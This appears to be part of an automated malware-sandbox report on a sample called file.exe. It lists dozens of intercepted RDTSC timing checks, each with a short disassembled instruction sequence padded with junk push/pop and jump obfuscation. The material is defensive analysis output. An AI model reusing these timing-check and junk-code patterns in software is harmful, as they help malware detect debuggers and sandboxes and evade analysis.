                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D24EF9 second address: B71989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ecx, dword ptr [ebp+122D3652h] 0x00000010 jnl 00007F0C44DA3FF2h 0x00000016 push dword ptr [ebp+122D15BDh] 0x0000001c mov ecx, dword ptr [ebp+122D2D17h] 0x00000022 call dword ptr [ebp+122D19DAh] 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D18EDh], edx 0x0000002f xor eax, eax 0x00000031 jmp 00007F0C44DA3FF9h 0x00000036 ja 00007F0C44DA3FE7h 0x0000003c cmc 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jns 00007F0C44DA3FECh 0x00000047 mov dword ptr [ebp+122D3676h], eax 0x0000004d mov dword ptr [ebp+122D18EDh], ecx 0x00000053 mov esi, 0000003Ch 0x00000058 mov dword ptr [ebp+122D18EDh], ebx 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 clc 0x00000063 lodsw 0x00000065 or dword ptr [ebp+122D2AFAh], esi 0x0000006b jc 00007F0C44DA3FE7h 0x00000071 stc 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 pushad 0x00000077 or ecx, dword ptr [ebp+122D353Eh] 0x0000007d movzx ecx, dx 0x00000080 popad 0x00000081 jmp 00007F0C44DA3FF7h 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a stc 0x0000008b nop 0x0000008c push eax 0x0000008d push edx 0x0000008e push edx 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25046 second address: D25057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F0C44EBA8E6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25057 second address: D2505D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2505D second address: D25077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44EBA8F6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D251E0 second address: D25210 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0C44DA3FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007F0C44DA3FF5h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push edi 0x00000017 pushad 0x00000018 jp 00007F0C44DA3FE6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25464 second address: D25468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25B35 second address: D25B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25C0A second address: D25C56 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0C44EBA8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b call 00007F0C44EBA8F6h 0x00000010 mov di, 7657h 0x00000014 pop edx 0x00000015 lea eax, dword ptr [ebp+1248662Fh] 0x0000001b call 00007F0C44EBA8F3h 0x00000020 sub dl, 0000001Ah 0x00000023 pop edi 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edi 0x00000029 pop edi 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25C56 second address: D25CD1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0C44DA3FECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0C44DA3FE8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 lea eax, dword ptr [ebp+124865EBh] 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F0C44DA3FE8h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 mov edi, 733769A6h 0x0000004c push eax 0x0000004d pushad 0x0000004e pushad 0x0000004f jmp 00007F0C44DA3FF4h 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D473 second address: D6D47B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D47B second address: D6D4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FF1h 0x00000009 pop eax 0x0000000a jmp 00007F0C44DA3FEFh 0x0000000f popad 0x00000010 pushad 0x00000011 jnp 00007F0C44DA3FF9h 0x00000017 pushad 0x00000018 jmp 00007F0C44DA3FF8h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D62B second address: D6D62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D62F second address: D6D64B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D64B second address: D6D669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44EBA8F9h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D669 second address: D6D66E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D66E second address: D6D674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D674 second address: D6D68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FF1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6D68E second address: D6D692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DD08 second address: D6DD0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DD0C second address: D6DD1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F0C44EBA8EEh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DD1E second address: D6DD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FEDh 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F0C44DA3FE6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DD39 second address: D6DD3F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DEB1 second address: D6DECF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F0C44DA3FE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0C44DA3FEFh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6DECF second address: D6DEE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44EBA8EBh 0x00000009 jnc 00007F0C44EBA8E6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7120E second address: D71218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D71218 second address: D71233 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C44EBA8E6h 0x00000008 jmp 00007F0C44EBA8ECh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D739BA second address: D739DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF3h 0x00000007 jmp 00007F0C44DA3FEDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D77EEF second address: D77F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F0C44EBA8E6h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D78051 second address: D78057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D781B5 second address: D781D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0C44EBA8F7h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D781D8 second address: D781E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0C44DA3FE6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D781E9 second address: D781ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D781ED second address: D7820C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0C44DA3FF5h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B056 second address: D7B060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0C44EBA8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B1BF second address: D7B1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B1C3 second address: D7B1E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0C44EBA8F6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B349 second address: D7B34D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D820CE second address: D820E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0C44EBA8E6h 0x0000000a jmp 00007F0C44EBA8EBh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D820E3 second address: D8210F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FF3h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0C44DA3FEFh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82271 second address: D82278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D82278 second address: D82295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0C44DA3FF8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8253C second address: D82545 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2564D second address: D25674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44DA3FF6h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c je 00007F0C44DA3FFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25674 second address: D25678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25678 second address: D256B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44DA3FEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dl, 95h 0x0000000c push 00000004h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F0C44DA3FE8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b je 00007F0C44DA3FE8h 0x00000031 push edi 0x00000032 pop edi 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D256B9 second address: D256D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0C44EBA8ECh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7CD7 second address: CE7CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7CDB second address: CE7CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007F0C44EBA8E6h 0x0000000f jp 00007F0C44EBA8E6h 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 popad 0x00000019 pop eax 0x0000001a popad 0x0000001b push esi 0x0000001c js 00007F0C44EBA8ECh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7CFF second address: CE7D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007F0C44DA3FE6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B4E4 second address: D8B4E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B4E8 second address: D8B4EE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B62D second address: D8B63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C44EBA8ECh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8B63D second address: D8B647 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0C44DA3FE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C588 second address: D8C5B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C44EBA8F6h 0x00000009 jmp 00007F0C44EBA8F2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8C5B4 second address: D8C5C4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007F0C44DA3FE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CBBF second address: D8CBC9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0C44EBA8EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8CBC9 second address: D8CC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F0C44DA3FF9h 0x0000000c jnc 00007F0C44DA3FE6h 0x00000012 jmp 00007F0C44DA3FF7h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d jmp 00007F0C44DA3FEBh 0x00000022 jbe 00007F0C44DA3FEEh 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D914F9 second address: D914FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D914FE second address: D91536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jmp 00007F0C44DA3FF7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jnp 00007F0C44DA3FE6h 0x00000017 jnl 00007F0C44DA3FE6h 0x0000001d popad 0x0000001e jc 00007F0C44DA3FE8h 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91536 second address: D91551 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8EFh 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F0C44EBA8E6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91551 second address: D91555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90954 second address: D9095A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90AD6 second address: D90ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90ADC second address: D90AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007F0C44EBA8E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90AEA second address: D90AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90C1A second address: D90C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007F0C44EBA8F3h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0C44EBA8F0h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90C4A second address: D90C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90C4E second address: D90C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90C52 second address: D90C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0C44DA3FFDh 0x0000000e popad 0x0000000f pushad 0x00000010 jo 00007F0C44DA3FEEh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90C83 second address: D90C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007F0C44EBA8E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90F9E second address: D90FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 jmp 00007F0C44DA3FEFh 0x0000000c jg 00007F0C44DA3FE6h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F0C44DA3FF9h 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F0C44DA3FEBh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90FE6 second address: D90FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90FEB second address: D90FF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90FF1 second address: D90FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D90FF7 second address: D90FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D95F12 second address: D95F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0C44EBA8EFh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9E153 second address: D9E165 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jo 00007F0C44DA4003h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9C3C8 second address: D9C3CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9C826 second address: D9C82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9C992 second address: D9C998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9C998 second address: D9C99C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9CC82 second address: D9CC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jbe 00007F0C44EBA8E6h 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9CFAF second address: D9CFB5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D127 second address: D9D13D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C44EBA8F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D13D second address: D9D147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0C44DA3FE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9D147 second address: D9D14B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9DFC4 second address: D9DFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0C44DA3FF3h 0x0000000a rdtsc
